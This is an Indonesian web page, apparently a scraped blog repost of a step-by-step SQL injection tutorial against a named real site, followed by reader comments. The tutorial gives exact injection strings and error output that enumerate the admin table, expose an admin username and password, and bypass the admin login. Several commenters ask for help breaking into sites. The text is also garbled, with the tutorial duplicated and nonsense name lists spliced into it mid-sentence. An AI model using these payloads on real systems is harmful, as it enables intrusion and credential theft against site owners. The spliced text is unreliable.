Kalau Apakah Cara Deface Website Gack Admin Joomla Hack Password
99
description
Kalau Apakah Cara Deface Website Gack Admin Joomla Hack Password
Transcript of Kalau Apakah Cara Deface Website Gack Admin Joomla Hack Password
Agus anin andi nunus
******************************************************Cara pencegahan yang umum digunakan :1. Batasi panjang input box (jika memungkinkan), dengancara membatasinya di kode program, jadi si cracker pemulaakan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.2. Filter input yang dimasukkan oleh user, terutama penggunaantanda kutip tunggal (Input Validation).3. Matikan atau sembunyikan pesan-pesan error yang keluardari SQL Server yang berjalan.4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,Extended Stored Procedures jika memungkinkan.5. Ubah “Startup and run SQL Server” menggunakan low privilege userdi SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan…..Hal itu adalah gambaran, betapa tidak amannya dunia internet…Kalau mau lebih aman, copot kabel jaringan anda, copot diskdrive anda, copot harddisk anda, jual kompie anda !!!Just kidding )
Referensi :[+] sqlinjection, www.BlackAngels.it[+] anvanced sql injection in sql server applications(www.ngssoftware.com)[+] sql injection walktrough (www.securiteam.com)
Special greets :[+] www.neoteker.or.id[+] www.bosen.net[+] ftp_geo[+] Schizoprenic (XNuxer Research Center) –> BEBASKAN DIA !!!
Sumber :
http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7
Possibly related posts: (automatically generated)Dermawan RahasiaAbout : SQL InjectionSQL Injection Vol-1SQL Injection #1
200702/06CATEGORYSecurityUndergroundWrite comment
Write commentComments RSSTrackback ( 0 )Comments ( 29 )
pahlawan bertopeng April 18th, 2007REPLY QUOTE
Gimana sih caranya bobol web dengan mudah dan gampangsihol August 21st, 2007REPLY QUOTE
thx for sharedsihol August 21st, 2007REPLY QUOTE
http://www.siholnet.comyansen September 20th, 2007
REPLY QUOTE
mas aku kesulitan dapat software untuk membagi bantwihts, boleh bagi aku situs yang gratis tuk mendapatkannya, atau mas punya. bisa sharing ke aku ngakmaster wong September 27th, 2007REPLY QUOTE
coba bobol kuis telkomselvanudin October 6th, 2007REPLY QUOTE
coba cari dihttp://www.patromax.combeezsystem October 30th, 2007REPLY QUOTE
bisa bantu gak?saya ingin dapet layanan unlimited talk dari indosat untuk wilayah jawa timur bisa kasih kode jalur forntline nya gak?terima kasihdiki November 16th, 2007REPLY QUOTE
aku perlu bantuan nih aku pemula yang lagi belajar vb net 2003 mau bikin database tapi konenktingnya via odbc gimana yahShinchi January 19th, 2008REPLY QUOTE
Woww Kerenn…mohon bimbingannya donk kk
Thx
-FuRkaN-RyZack_The_RippeR March 1st, 2008REPLY QUOTE
Thx be4, 4 infonya…Hyder March 22nd, 2008REPLY QUOTE
Hello,Aku punya project ntuk hack laman web dan ganti info di dalamnya.
Kalau ada yang interest tolong eamil ke [email protected]
kazelpearl May 10th, 2008REPLY QUOTE
ma’af aku baru di bidang ini, bisa kirim tutorial lengkapnya nggak ke emailku [email protected] ya masaink August 29th, 2008REPLY QUOTE
coba ajajapra October 13th, 2008REPLY QUOTE
masih bingung tp gua akan berusahaFery January 21st, 2009REPLY QUOTE
Maaf gua masih blum paham sepenuhnya..tolong lengkapi aplikasi beserta password dan katerangnannya ke emailku..terima kasih sebelumnya…Ronal Marado February 6th, 2009REPLY QUOTE
bisa kirim tutorial lengkap tentang hacker dan bobol webcH1km0nK February 7th, 2009REPLY QUOTE
mas q ga ngerti mksdnya itu sql injectionNyada tutor palink dasar ga masfakih February 16th, 2009REPLY QUOTE
wew kepanjangan bosssAdmin February 16th, 2009REPLY QUOTE
punya cara singkatnya?silahkan di share disinianaktetangga March 3rd, 2009REPLY QUOTE
kok tutiorialnya sama percis ama http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7sapa yang bener ?
tapi gak apa2 bagi2 ilmu
thxAdmin March 3rd, 2009REPLY QUOTE
terima kasih atas koreksinya. wkt itu saya dptnya dimilis. makanya nulisnya sumbernya kiriman dari. tp skrg sdh saya rubah sumbernya.badMAIL March 21st, 2009REPLY QUOTE
caranya belajar SQL duluh..kekekeke.. ntar klo dah nemu bermacam macam tabel dijadiin satu pasti agak pusing.. ;p !!richardo Sitompul
SQL Injection, step by stepBy D-andPublished: April 25, 2007
/********************************************************* * SQL Injection, step by step. * * No Warranty. This tutorial is for educational use only, * commercial use is prohibited. * **********************************************************/
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?Anda tahu betapa berbahaya bug yang satu ini ?Berikut akan kita sajikan step by step SQL Injection ini.Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.idAda dua kelemahan di site ini, yaitu:1. Tabel News2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-injectdengan jalan berjalan-jalan (enumeration) dulu di site tsb.Kita akan menemukan 2 model cara input parameter, yaitu dengancara memasukkan lewat input box dan memasukkannya lewatalamat URL.
Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.aspLangkah pertama untuk menentukan nama tabel dan fieldnya,kita inject kotak NIP dengan perintah (password terserah, cabangbiarkan aja):' having 1=1--jangan lupa untuk menuliskan tanda kutip tunggal dan tandaminus dobel (penting).Arti kedua tanda tsb bisa anda cari di tutorial SQL Injectiondi www.neoteker.or.id ini (lihat arsip sebelumnya).Kemudian akan keluar pesan error:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.NOMOR' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause./sipm/admin/dologin.asp, line 7--------------------Keluarlah nama field pertama kita !!!Catat nama tabel : T_ADMINCatat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,beserta nama tabel yang mungkin berbeda-beda.Kita inject di kotak NIP (password terserah):' group by T_ADMIN.NOMOR having 1=1--Akan keluar pesan error:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.NIP' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause./sipm/admin/dologin.asp, line 7--------------------Artinya itulah nama tabel dan field kedua kita.Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--Akan keluar pesan error:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column
solikin tanti sulashadi sariman wardi warni
agus wardi warni sarimanharjono mulyani nuk wardi
agus sarimanwidi sarimanyanti saerimandias sariman
rangking 100000000000 se solomarried and drink
agus wardi warni sarimanharjono mulyani nuk wardi
agus sarimanwidi sarimanyanti saerimandias sariman rangking 100000000000 se solomarried and drink
agus wardi warni sarimanharjono mulyani nuk wardi
agus sarimanwidi sarimanyanti saeriman
dias sariman rangking 100000000000 se solomarried and drink
agus wardi warni sariman
harjono mulyani nuk wardi
agus sarimanwidi sarimanyanti saerimandias sariman rangking 100000000000 se
solomarried and drink
agus wardi warni sarimanharjono mulyani nuk wardi
agus sarimanwidi sariman
yanti saerimandias sariman rangking 100000000000 se solomarried and drink
agus wardi warni sarimanharjono mulyani nuk wardi
agus sarimanwidi sarimanyanti saerimandias sariman
rangking 100000000000 se solomarried and drink
haris tini
awang haris mulyani nuk harjono
sumarto
solikin tanti sulashadi sariman wardi warni
agus wardi warni
sarimanharjono mulyani nuk wardi
agus sarimanwidi sarimanyanti saerimandias sariman rangking
100000000000 se solomarried and drink
awang haris mulyani nuk harjono
sumarto
agus wardi warni sarimanharjono mulyani nuk wardi
agus sarimanwidi sariman
yanti saerimandias sariman rangking 100000000000 se solomarried and drink
solikin tanti sulashadi sariman wardi warni
'T_ADMIN.PASSWORD' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause./sipm/admin/dologin.asp, line 7--------------------Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecekfield terakhir dengan meng-inject:' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--(catatan : kalimat harus 1 baris, tidak dipotong)--------------------- NIP atau Password atau Unit Anda salah !! ---------------------Sukses !!! Kita berhasil menemukan field terakhir.Daftar kolom (field):T_ADMIN.NOMOR T_ADMIN.NIP T_ADMIN.PASSWORD T_ADMIN.NAMA T_ADMIN.KD_RANTING T_ADMIN.ADDRESS T_ADMIN.EMAIL Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :' union select sum(NOMOR) from T_ADMIN--Arti dari query tersebut adalah : kita coba menerapkanklausa sum sebelum menentukan apakah jumlah kolom-kolomdi dua rowsets adalah sejenis.Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)yang berlaku untuk type kolom numerik, jadi untuk type kolomyang bukan numerik, akan keluar error yang bisa memberitahu kita jenis kolom yang dimaksud.Pesan error :--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists./sipm/admin/dologin.asp, line 7--------------------artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :' union select sum(NIP) from T_ADMIN--Akan keluar pesan error :--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a char data type as an argument./sipm/admin/dologin.asp, line 7--------------------Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :' union select sum(nama_kolom) from T_ADMIN--dengan kolom yang berikutnya.Kita peroleh 7 type kolom:T_ADMIN.NOMOR => numericT_ADMIN.NIP => charT_ADMIN.PASSWORD => nvarcharT_ADMIN.NAMA => charT_ADMIN.KD_RANTING => charT_ADMIN.ADDRESS => nvarcharT_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,untuk user admin, dengan meng-inject :' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--artinya kita memilih minimum nama user yang lebih besar dari 'a'dan mencoba meng-konvert-nya ke tipe integer.Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih kolom NAMA, dan mengabaikan 6 kolom yang lain.Akan keluar pesan error :--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'bill ' to a column of data type int./sipm/admin/dologin.asp, line 7--------------------Anda lihat :varchar value 'bill ''bill' itu adalah nama user di record yang terakhir dimasukkan,atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'--catatan : harus sebaris (tidak dipotong).Akan keluar error :---------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm@mpusk@u' to a column of data type int./sipm/admin/dologin.asp, line 7---------------------Artinya kita berhasil !!!Kita dapatkan [+] NAMA = bill[+] PASSWORD = m@mpusk@u
Silahkan login ke :www.pln-wilkaltim.co.id/sipm/admin/admin.aspdengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja....
Kita inject-kan :' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN where NAMA ='bill'--catatan : harus satu baris.Duarrrrrr..........Glhodhak.............Langsung masuk ke menu admin.Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.Pada dasarnya berita di situ adalah isi dari tabel yang lain lagi. Jadi tetep bisa kita inject !!!Bedanya, kita harus memasukkan parameter di alamat URL-nya.Contoh :www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2ada parameter id dan idSM.Setelah kita coba inject, ternyata yang berpengaruh adalah parameter id aja (CMIIW).
Kita inject-kan :www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--akan keluar pesan error :---------------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tb_news.NewsId' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause./dari_Media.asp, line 58---------------------------artinya 'tb_news.NewsId' itulah nama tabel dan kolom kitayang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :tb_news.NewsId => numerictb_news.NewsCatId => numerictb_news.EntryDate => datetimetb_news.Title => nvarchartb_news.Content => tb_news.FotoLink =>tb_news.FotoType => bit datatb_news.review => tb_news.sumber => chartb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkanpengetahuan anda.Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hackoleh Shizoprenic, juga ada di tabel-tabel suatu database,jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!******************************************************Cara pencegahan yang umum digunakan :1. Batasi panjang input box (jika memungkinkan), dengancara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.2. Filter input yang dimasukkan oleh user, terutama penggunaantanda kutip tunggal (Input Validation).3. Matikan atau sembunyikan pesan-pesan error yang keluardari SQL Server yang berjalan.4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,Extended Stored Procedures jika memungkinkan.5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan.....Hal itu adalah gambaran, betapa tidak amannya dunia internet...Kalau mau lebih aman, copot kabel jaringan anda, copot diskdrive anda, copot harddisk anda, jual kompie anda !!!Just kidding )
Referensi :awang haris mulyani nuk
harjono sumarto[+] sqlinjection, www.BlackAngels.it[+] anvanced sql injection in sql server applications (www.ngssoftware.com)[+] sql injection walktrough (www.securiteam.com)
BELAJAR (Jangan pernah berhenti belajar) news, library, tutorial, motivationHOMEAbout
Bobol Web dengan Step-by-Step SQL Injection
Hingga Maret 2006, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan iko ([email protected])
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.Kita akan mengambil contoh di site www.pln-wilkaltim.co.idAda dua kelemahan di site ini, yaitu:1. Tabel News2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-injectdengan jalan berjalan-jalan (enumeration) dulu di site tsb.Kita akan menemukan 2 model cara input parameter, yaitu dengancara memasukkan lewat input box dan memasukkannya lewatalamat URL.
Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk admin.Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,kita inject kotak NIP dengan perintah (password terserah, cabang biarkan aja): ‘ having 1=1–jangan lupa untuk menuliskan tanda kutip tunggal dan tanda minus dobel (penting).Arti kedua tanda tsb bisa anda cari di tutorial SQL Injectiondi www.neoteker.or.id ini (lihat arsip sebelumnya).Kemudian akan keluar pesan error:——————–Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column‘T_ADMIN.NOMOR’ is invalid in the select list becauseit is not contained in an aggregate function andthere is no GROUP BY clause./sipm/admin/dologin.asp, line 7——————–Keluarlah nama field pertama kita !!!Catat nama tabel : T_ADMINCatat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,beserta nama tabel yang mungkin berbeda-beda.Kita inject di kotak NIP (password terserah):‘ group by T_ADMIN.NOMOR having 1=1–Akan keluar pesan error:——————–Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column‘T_ADMIN.NIP’ is invalid in the select list becauseit is not contained in either an aggregatefunction or the GROUP BY clause./sipm/admin/dologin.asp, line 7——————–Artinya itulah nama tabel dan field kedua kita.Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1–Akan keluar pesan error:——————–Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column‘T_ADMIN.PASSWORD’ is invalid in the select list becauseit is not contained in either an aggregatefunction or the GROUP BY clause./sipm/admin/dologin.asp, line 7——————–Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecekfield terakhir dengan meng-inject:‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAILhaving 1=1–(catatan : kalimat harus 1 baris, tidak dipotong)——————–- NIP atau Password atau Unit Anda salah !! -——————–Sukses !!! Kita berhasil menemukan field terakhir.Daftar kolom (field):T_ADMIN.NOMORT_ADMIN.NIPT_ADMIN.PASSWORDT_ADMIN.NAMAT_ADMIN.KD_RANTINGT_ADMIN.ADDRESST_ADMIN.EMAILHanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :‘ union select sum(NOMOR) from T_ADMIN–Arti dari query tersebut adalah : kita coba menerapkanklausa sum sebelum menentukan apakah jumlah kolom-kolomdi dua rowsets adalah sejenis.Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)yang berlaku untuk type kolom numerik, jadi untuk type kolomyang bukan numerik, akan keluar error yang bisa memberitahukita jenis kolom yang dimaksud.Pesan error :——————–Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]All queriesin an SQL statement containing a UNION operator must havean equal number of expressions in their target lists./sipm/admin/dologin.asp, line 7——————–artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :‘ union select sum(NIP) from T_ADMIN–Akan keluar pesan error :——————–Microsoft OLE DB Provider for ODBC Drivers (0×80040E07)[Microsoft][ODBC SQL Server Driver][SQL Server]The sumor average aggregate operation cannot take a char datatype as an argument./sipm/admin/dologin.asp, line 7——————–Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yangberikutnya dengan jalan mengganti nama_kolom di :‘ union select sum(nama_kolom) from T_ADMIN–dengan kolom yang berikutnya.Kita peroleh 7 type kolom:T_ADMIN.NOMOR => numericT_ADMIN.NIP => charT_ADMIN.PASSWORD => nvarcharT_ADMIN.NAMA => charT_ADMIN.KD_RANTING => charT_ADMIN.ADDRESS => nvarcharT_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,untuk user admin, dengan meng-inject :‘ union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > ‘a’–artinya kita memilih minimum nama user yang lebih besar dari ‘a’dan mencoba meng-konvert-nya ke tipe integer.Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilihkolom NAMA, dan mengabaikan 6 kolom yang lain.Akan keluar pesan error :——————–Microsoft OLE DB Provider for ODBC Drivers (0×80040E07)[Microsoft][ODBC SQL Server Driver][SQL Server]Syntaxerror converting the varchar value ‘bill ‘ toa column of data type int./sipm/admin/dologin.asp, line 7——————–Anda lihat :varchar value ‘bill ‘‘bill’ itu adalah nama user di record yang terakhir dimasukkan,atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :‘ union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN whereNAMA = ‘bill’–catatan : harus sebaris (tidak dipotong).Akan keluar error :———————Microsoft OLE DB Provider for ODBC Drivers (0×80040E07)[Microsoft][ODBC SQL Server Driver][SQL Server]Syntaxerror converting the nvarchar value ‘m@mpusk@u’ to acolumn of data type int./sipm/admin/dologin.asp, line 7———————Artinya kita berhasil !!!Kita dapatkan[+] NAMA = bill[+] PASSWORD = m@mpusk@u
Silahkan login ke :www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan andaisi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja….
Kita inject-kan :‘ union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMINwhere NAMA =’bill’–catatan : harus satu baris.Duarrrrrr……….Glhodhak………….Langsung masuk ke menu admin.Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.Pada dasarnya berita di situ adalah isi dari tabel yanglain lagi. Jadi tetep bisa kita inject !!!Bedanya, kita harus memasukkan parameter di alamat URL-nya.Contoh :www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2ada parameter id dan idSM.Setelah kita coba inject, ternyata yang berpengaruh adalahparameter id aja (CMIIW).
Kita inject-kan :www.pln-wilkaltim.co.id/dari_Media.asp?id=2119′ having 1=1–akan keluar pesan error :—————————Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column‘tb_news.NewsId’ is invalid in the select list becauseit is not contained in an aggregate function andthere is no GROUP BY clause./dari_Media.asp, line 58—————————artinya ‘tb_news.NewsId’ itulah nama tabel dan kolom kitayang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :tb_news.NewsId => numerictb_news.NewsCatId => numerictb_news.EntryDate => datetimetb_news.Title => nvarchartb_news.Content =>tb_news.FotoLink =>tb_news.FotoType => bit datatb_news.review =>tb_news.sumber => chartb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkanpengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiriisinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hackoleh Shizoprenic, juga ada di tabel-tabel suatu database,jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!awang haris mulyani nuk harjono sumarto******************************************************Cara pencegahan yang umum digunakan :1. Batasi panjang input box (jika memungkinkan), dengancara membatasinya di kode program, jadi si cracker pemulaakan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.2. Filter input yang dimasukkan oleh user, terutama penggunaantanda kutip tunggal (Input Validation).3. Matikan atau sembunyikan pesan-pesan error yang keluardari SQL Server yang berjalan.4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,Extended Stored Procedures jika memungkinkan.5. Ubah “Startup and run SQL Server” menggunakan low privilege userdi SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan…..Hal itu adalah gambaran, betapa tidak amannya dunia internet…
Kalau mau lebih aman, copot kabel jaringan anda, copot diskdrive anda, copot harddisk anda, jual kompie anda !!!Just kidding )
Referensi :[+] sqlinjection, www.BlackAngels.it[+] anvanced sql injection in sql server applications(www.ngssoftware.com)[+] sql injection walktrough (www.securiteam.com)
Special greets :[+] www.neoteker.or.id[+] www.bosen.net[+] ftp_geo[+] Schizoprenic (XNuxer Research Center) –> BEBASKAN DIA !!!
Sumber :
http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7
Possibly related posts: (automatically generated)Dermawan RahasiaAbout : SQL InjectionSQL Injection Vol-1SQL Injection #1
200702/06CATEGORYSecurityUndergroundWrite comment
Write commentComments RSSTrackback ( 0 )Comments ( 29 )
pahlawan bertopeng April 18th, 2007REPLY QUOTE
Gimana sih caranya bobol web dengan mudah dan gampangsihol August 21st, 2007REPLY QUOTE
thx for sharedsihol August 21st, 2007REPLY QUOTE
http://www.siholnet.comyansen September 20th, 2007REPLY QUOTE
mas aku kesulitan dapat software untuk membagi bantwihts, boleh bagi aku situs yang gratis tuk mendapatkannya, atau mas punya. bisa sharing ke aku ngakmaster wong September 27th, 2007REPLY QUOTE
coba bobol kuis telkomselvanudin October 6th, 2007REPLY QUOTE
coba cari dihttp://www.patromax.combeezsystem October 30th, 2007REPLY QUOTE
bisa bantu gak?saya ingin dapet layanan unlimited talk dari indosat untuk wilayah jawa timur bisa kasih kode jalur forntline nya gak?terima kasihdiki November 16th, 2007REPLY QUOTE
aku perlu bantuan nih aku pemula yang lagi belajar vb net 2003 mau bikin database tapi konenktingnya via odbc gimana yahShinchi January 19th, 2008REPLY QUOTE
Woww Kerenn…mohon bimbingannya donk kk
Thx
-FuRkaN-RyZack_The_RippeR March 1st, 2008REPLY QUOTE
Thx be4, 4 infonya…Hyder March 22nd, 2008REPLY QUOTE
Hello,
Aku punya project ntuk hack laman web dan ganti info di dalamnya.
Kalau ada yang interest tolong eamil ke [email protected] May 10th, 2008REPLY QUOTE
ma’af aku baru di bidang ini, bisa kirim tutorial lengkapnya nggak ke emailku [email protected] ya masaink August 29th, 2008REPLY QUOTE
coba ajajapra October 13th, 2008REPLY QUOTE
masih bingung tp gua akan berusahaFery January 21st, 2009REPLY QUOTE
Maaf gua masih blum paham sepenuhnya..tolong lengkapi aplikasi beserta password dan katerangnannya ke emailku..terima kasih sebelumnya…Ronal Marado February 6th, 2009REPLY QUOTE
bisa kirim tutorial lengkap tentang hacker dan bobol webcH1km0nK February 7th, 2009REPLY QUOTE
mas q ga ngerti mksdnya itu sql injectionNyada tutor palink dasar ga masfakih February 16th, 2009REPLY QUOTE
wew kepanjangan bosssAdmin February 16th, 2009REPLY QUOTE
punya cara singkatnya?silahkan di share disinianaktetangga March 3rd, 2009REPLY QUOTE
kok tutiorialnya sama percis ama
http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7sapa yang bener ?
tapi gak apa2 bagi2 ilmu
thxAdmin March 3rd, 2009REPLY QUOTE
terima kasih atas koreksinya. wkt itu saya dptnya dimilis. makanya nulisnya sumbernya kiriman dari. tp skrg sdh saya rubah sumbernya.badMAIL March 21st, 2009REPLY QUOTE
caranya belajar SQL duluh..kekekeke.. ntar klo dah nemu bermacam macam tabel dijadiin satu pasti agak pusing.. ;p !!richardo Sitompul May 6th, 2009REPLY QUOTE
waduh mas ribet amat c…aq masih ga ngertimas..pusing..ada cara yang lebih mudah gablajr sql_injection nya?aq pengen ngerti mas.mksih..blz ke email aq ya mas..Admin May 6th, 2009REPLY QUOTE
coba kunjungi http://jasakom.comdisitu lengkapLamerz June 17th, 2009REPLY QUOTE
Aq pengen yg php inject boz.monx July 8th, 2009REPLY QUOTE
sip…makasih infonya…seno,, July 23rd, 2009REPLY QUOTE
mas aq pendatang bbaru juga,,,jadi haruss banyak belajar,,,jadi mas,, tolong bagi2 ilmunya donkk,,aq pengen belajar dari awall,,menurut mas yang baru belajar cocoknya belajar dari mana dulu y,,,,
Hacker QLL3R September 10th, 2009REPLY QUOTE
wadoh bingung gwpanjang bgtHacker QLL3R September 10th, 2009REPLY QUOTE
Bingung gw cara nya susah bgtNAME( required )
E-MAIL( required ) - will not be published -
URL
Notify me of follow-up comments via email.
Notify me of new posts via email.BelajarInformation is FREERSS FEED
Disclaimer: Nor the author or the host of this blog is any way related to the contents available. This site does not host any copyright infringing contents on its server. This website is a compilation of the resources available from the Internet. We only index and link to content provided by other websites. If you have any issues regarding copyright, please contact us and we will remove offending contents ASAP.All other trademarks are the sole property of their respective owners.Categories Top PostsArti Definisi / Pengertian Pemasaran Menurut Para AhliMencegah Pengaruh Negatif Internet Terhadap Perkembangan Seksualitas AnakDaftar Gaji PNS 2010 Setiap GolonganKursus Bahasa Inggris GratisMakna Kata Ulang Dalam Bahasa Indonesia - Arti Pengertian Perulangan KataRecent PostsGratis, Try Out Online untuk Pelajar SD di Indismart Komunitas Lowongan Kerja (VACANCY) CPSSoft PT. Equity Life Indonesia PT Midas Solusi Utama Recent Comments Admin on Cara Belajar Cepat Membaca, Me…
Budisastro on Cara Belajar Cepat Membaca, Me…heri on Makna Kata Ulang Dalam Bahasa …thechatter on Free Magazine Style Theme The…
hary on JakPromo – Website Iklan…
Top Clicksbisnis.vivanews.com/news/…chabelita.biz/component/c…tvone.co.id/berita/view/2…suhanto.com/2009/08/magen…en.wordpress.com/tag/info…Sejak Agustus 2006, Anda adalah pengunjung ke : Category CloudAccess Arsitek & Teknik Sipil ASCII Bahasa Download Fisika Free Wordpress Theme Hardware Indonesia Info Lowongan Islam Kata Library Stuff Linux Matematika Misc Motivasi News Oracle Photoshop PHP Programming Security Situs Software SQL Tips Underground Windows Word Tagsarsitek Download Hardware library Linux lowongan Motivasi News PHP pustakawan Security site Software SQL Tips wordpress detikInetKapasitas Blu-ray Tembus 128GBGears of War 3 Suguhkan Gaya Bertempur BaruAplikasi 'Twitter for BlackBerry' Versi Beta DirilisGame Kerajaan China Siap Open Beta di IndonesiaScanSnap S1300, Pemindai Bergerak dengan Fitur CerdasSiap-Siap Ikuti Kompetisi TI NasionalGoogle Maps 4.0 Sambangi BlackBerryBos Teknologi Yahoo MundurDeretan Tablet Android Siap Gempur iPadRIM Tangkis Hoax BBM di Amerika dan Asia Tabloid PC 